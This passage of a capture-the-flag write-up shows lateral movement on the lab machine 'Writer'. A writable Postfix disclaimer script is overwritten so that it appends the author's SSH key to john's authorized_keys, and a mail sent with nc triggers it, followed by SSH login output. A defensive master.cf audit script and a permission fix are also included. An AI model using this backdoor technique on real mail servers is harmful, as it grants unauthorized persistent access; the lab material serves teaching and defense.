Postfix


As previously discovered, the Postfix instance is configured in master.cf to run the /etc/postfix/disclaimer script whenever the john user receives a new mail, and the current user (kyle) has write access to that script. Whatever kyle writes into /etc/postfix/disclaimer therefore executes as soon as the next mail for john is delivered, so all that is needed is a payload that drops my SSH public key into john's authorized_keys file and a mail to john to trigger it.
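
Before overwriting the script it is worth confirming, from master.cf itself, which pipe(8) service hands mail to the script and which user= account that service runs as, because that account is the one the payload will execute as. The bash script below is an added example and not part of the original writeup: it parses pipe(8) entries out of master.cf text and flags filter commands the current user can write to. The master.cf text embedded in it is a constructed sample written in master(5)/pipe(8) syntax; the dfilt service name, the uucp entry and the smtpd option line are assumptions, not the target's configuration.

```shell
#!/bin/bash
# Added example, not code from the original writeup: list Postfix pipe(8)
# services from a master.cf and flag filter commands the current user can write.
# The master.cf text below is a CONSTRUCTED sample following master(5)/pipe(8)
# syntax; its service names and paths are assumptions, not the target's config.

SAMPLE_MASTER_CF='# service type  private unpriv  chroot  wakeup  maxproc command + args
smtp      inet  n       -       y       -       -       smtpd
  -o content_filter=dfilt:
dfilt     unix  -       n       n       -       -       pipe
  flags=Rq user=john argv=/etc/postfix/disclaimer -f ${sender} -- ${recipient}
uucp      unix  -       n       n       -       -       pipe
  flags=Fqhu user=uucp argv=uux -r -n -z -a$sender - $nexthop ($recipient)'

# stdin: master.cf text.  stdout: one "<service> <user> <argv0>" line per pipe(8)
# service.  A service line carries 8 fields (name type private unpriv chroot wakeup
# maxproc command); the command's key=value arguments may follow on the same line
# or on continuation lines that begin with whitespace.
pipe_services() {
  awk '
    function scan(start,    i, f) {
      for (i = start; i <= NF; i++) {
        f = $i
        if (f ~ /^user=/)      { sub(/^user=/, "", f); sub(/:.*/, "", f); usr = f }
        else if (f ~ /^argv=/) { sub(/^argv=/, "", f); cmd = f }
      }
    }
    function emit() {
      if (type == "pipe" && cmd != "") print svc, (usr == "" ? "-" : usr), cmd
    }
    /^[[:space:]]*#/ || /^[[:space:]]*$/ { next }   # comments and blank lines
    /^[^[:space:]]/ {                               # start of a service entry
      emit()
      svc = $1; type = $8; usr = ""; cmd = ""
      if (type == "pipe") scan(9)                   # arguments on the same line
      next
    }
    type == "pipe" { scan(1) }                      # continuation line of a pipe entry
    END { emit() }
  '
}

# Returns 0 if the command file exists and the current user may write to it.
# Anyone who can edit a pipe(8) command gets code execution as its user= account
# on the next message that traverses that service.
script_writable() {
  [ -f "$1" ] && [ -w "$1" ]
}

# stdin: master.cf text.  Prints one finding per pipe(8) service.  Only absolute
# argv paths are checked; bare names such as "uux" are resolved through PATH.
audit_master_cf() {
  pipe_services | while read -r svc usr cmd; do
    case "$cmd" in
      /*) if script_writable "$cmd"; then state="WRITABLE"; else state="not writable or absent"; fi ;;
      *)  state="unchecked (relative path)" ;;
    esac
    printf '%-8s user=%-8s %s [%s]\n' "$svc" "$usr" "$cmd" "$state"
  done
}

# Demo on the constructed sample; on a real host: audit_master_cf < /etc/postfix/master.cf
printf '%s\n' "$SAMPLE_MASTER_CF" | audit_master_cf
```

On the target the same functions would be pointed at the real file (`audit_master_cf < /etc/postfix/master.cf`). The defensive fix is the inverse of the finding: a pipe(8) command should be owned by root and not writable by the account it runs as or by any unprivileged user (for example `chown root:root /etc/postfix/disclaimer; chmod 755 /etc/postfix/disclaimer`), because every message that passes through the filter turns a writable script into a code-execution trigger.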

kyle@writer:~$ cat givemejohn 
#!/bin/bash
# Replace the disclaimer script with a one-liner that appends my SSH public key
# to john's authorized_keys; Postfix runs this file (via master.cf) as soon as
# john receives a mail
echo 'echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGoUoI9LYwEoMSDFaLZNQ51dLFNZf27nQjV7fooImm5g kali@kali" >> /home/john/.ssh/authorized_keys' > /etc/postfix/disclaimer

# Immediately send a mail to john to trigger the disclaimer script through master.cf
# (the empty line after the Subject header ends the headers; the lone "." ends DATA)
nc localhost 25 << EOF
EHLO writer.htb
mail from:<kyle@writer.htb>
rcpt to:<john@writer.htb>
DATA
Subject: Lateral Movement

Thank you for the shell
.
QUIT
EOF

Because a root cron job keeps interfering with the modified disclaimer script, the overwrite and the triggering mail have to happen back to back, so I wrote the quick bash script above to automate both steps.

kyle@writer:~$ ./givemejohn 
220 writer.htb ESMTP Postfix (Ubuntu)
250-writer.htb
250-PIPELINING
250-SIZE 10240000
250-VRFY
250-ETRN
250-STARTTLS
250-ENHANCEDSTATUSCODES
250-8BITMIME
250-DSN
250-SMTPUTF8
250 CHUNKING
250 2.1.0 Ok
250 2.1.5 Ok
354 End data with <CR><LF>.<CR><LF>
250 2.0.0 ok: queued as C8AA8823
221 2.0.0 Bye

Executing

I also had pspy running in the background to capture the whole process. As shown, the disclaimer script is invoked through the configuration set in the master.cf file, and my public SSH key is appended to the authorized_keys file of the john user.

Now I should be able to connect to the target system as the john user over SSH using my own key.

SSH


┌──(kali㉿kali)-[~/archive/htb/labs/writer]
└─$ ssh john@writer.htb -i ~/.ssh/id_ed25519
Enter passphrase for key '/home/kali/.ssh/id_ed25519': 
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-80-generic x86_64)
 
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
 
  System information as of Wed 19 Apr 21:13:34 UTC 2023
 
  System load:           0.03
  Usage of /:            66.4% of 6.82GB
  Memory usage:          39%
  Swap usage:            0%
  Processes:             265
  Users logged in:       1
  IPv4 address for eth0: 10.10.11.101
  IPv6 address for eth0: dead:beef::250:56ff:feb9:8e54
 
 
0 updates can be applied immediately.
 
 
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
 
 
You have new mail.
Last login: Wed Jul 28 09:19:58 2021 from 10.10.14.19
john@writer:~$ whoami
john
john@writer:~$ hostname
writer
john@writer:~$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.11.101  netmask 255.255.254.0  broadcast 10.10.11.255
        inet6 dead:beef::250:56ff:feb9:8e54  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::250:56ff:feb9:8e54  prefixlen 64  scopeid 0x20<link>
        ether 00:50:56:b9:8e:54  txqueuelen 1000  (Ethernet)
        RX packets 1253981  bytes 213952324 (213.9 MB)
        RX errors 0  dropped 222  overruns 0  frame 0
        TX packets 1691962  bytes 804866956 (804.8 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 5115915  bytes 10739064176 (10.7 GB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 5115915  bytes 10739064176 (10.7 GB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Lateral movement to the john user achieved by exploiting the misconfigured Postfix instance (a writable disclaimer script executed on every mail delivered to john).